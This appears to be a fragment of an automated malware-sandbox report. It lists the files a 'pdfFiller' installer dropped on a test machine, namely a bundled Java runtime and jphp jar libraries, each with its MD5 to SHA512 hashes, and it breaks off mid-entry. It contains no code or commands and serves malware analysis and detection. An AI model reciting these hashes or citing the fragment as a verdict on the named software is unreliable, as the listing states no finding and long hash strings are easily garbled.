SHA512 ce4888eba51baf13e09b5a0f506be28bfabff4a84831db25993673e30dcf342f54801a1bf8c8bc5898487da91d4b606e5cc8deea2574ed49ce78bf7ab94b0516

memory/3004-20-0x00000000001B0000-0x000000000029E000-memory.dmp

memory/3004-23-0x00000000001B1000-0x0000000000259000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp

MD5 4d249e135d4ae493ac8a946aa242d48a
SHA1 3ff02b2857f71f81854a6ee6ae2639f18b0ea8aa
SHA256 ad713590abb05f828e36b91ff0c1b1d44cbb61c3b5d40455791f2a7df5763261
SHA512 4031cbb905d9ac0e7f48c4e75171aa7e4df5efad7cd62295faf319aaacbd27baf0afe14a828bf98661164ac01be5589493ede3a82293890756a65bebfe50d089

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe

MD5 48c96771106dbdd5d42bba3772e4b414
SHA1 e84749b99eb491e40a62ed2e92e4d7a790d09273
SHA256 a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22
SHA512 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\verify.dll

MD5 de2167a880207bbf7464bcd1f8bc8657
SHA1 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7
SHA256 fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3
SHA512 bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\java.dll

MD5 73bd0b62b158c5a8d0ce92064600620d
SHA1 63c74250c17f75fe6356b649c484ad5936c3e871
SHA256 e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30
SHA512 eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\meta-index

MD5 91aa6ea7320140f30379f758d626e59d
SHA1 3be2febe28723b1033ccdaa110eaf59bbd6d1f96
SHA256 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4
SHA512 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\zip.dll

MD5 cb99b83bbc19cd0e1c2ec6031d0a80bc
SHA1 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd
SHA256 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec
SHA512 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\meta-index

MD5 77abe2551c7a5931b70f78962ac5a3c7
SHA1 a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc
SHA256 c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4
SHA512 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

C:\Users\Admin\AppData\Roaming\Installer\lib\asm-all.jar

MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

C:\Users\Admin\AppData\Roaming\Installer\lib\dn-compiled-module.jar

MD5 bd1f1a2246004487d4c84a233cea37f7
SHA1 24b9e6f765da1bcd2d424fd28b68fc40e368520e
SHA256 5183a2bca7735453b7fd5ca57ebb47ad32dd82d830eaddafed50a658164bdd76
SHA512 800e6a5dd529e9627320c7989720c0086a76ca7fbca6d3ccfcfea04871017a0f212926ccf3b4c16c958615e5ca0db19a53ccee53f17034384eb8c9c933e7608c

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-gui-ext.jar

MD5 6696368a09c7f8fed4ea92c4e5238cee
SHA1 f89c282e557d1207afd7158b82721c3d425736a7
SHA256 c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4
SHA512 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-desktop-ext.jar

MD5 b50e2c75f5f0e1094e997de8a2a2d0ca
SHA1 d789eb689c091536ea6a01764bada387841264cb
SHA256 cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23
SHA512 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-core.jar

MD5 7e5e3d6d352025bd7f093c2d7f9b21ab
SHA1 ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57
SHA256 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a
SHA512 c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-app-framework.jar

MD5 0c8768cdeb3e894798f80465e0219c05
SHA1 c4da07ac93e4e547748ecc26b633d3db5b81ce47
SHA256 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669
SHA512 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

C:\Users\Admin\AppData\Roaming\Installer\lib\gson.jar

MD5 5134a2350f58890ffb9db0b40047195d
SHA1 751f548c85fa49f330cecbb1875893f971b33c4e
SHA256 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32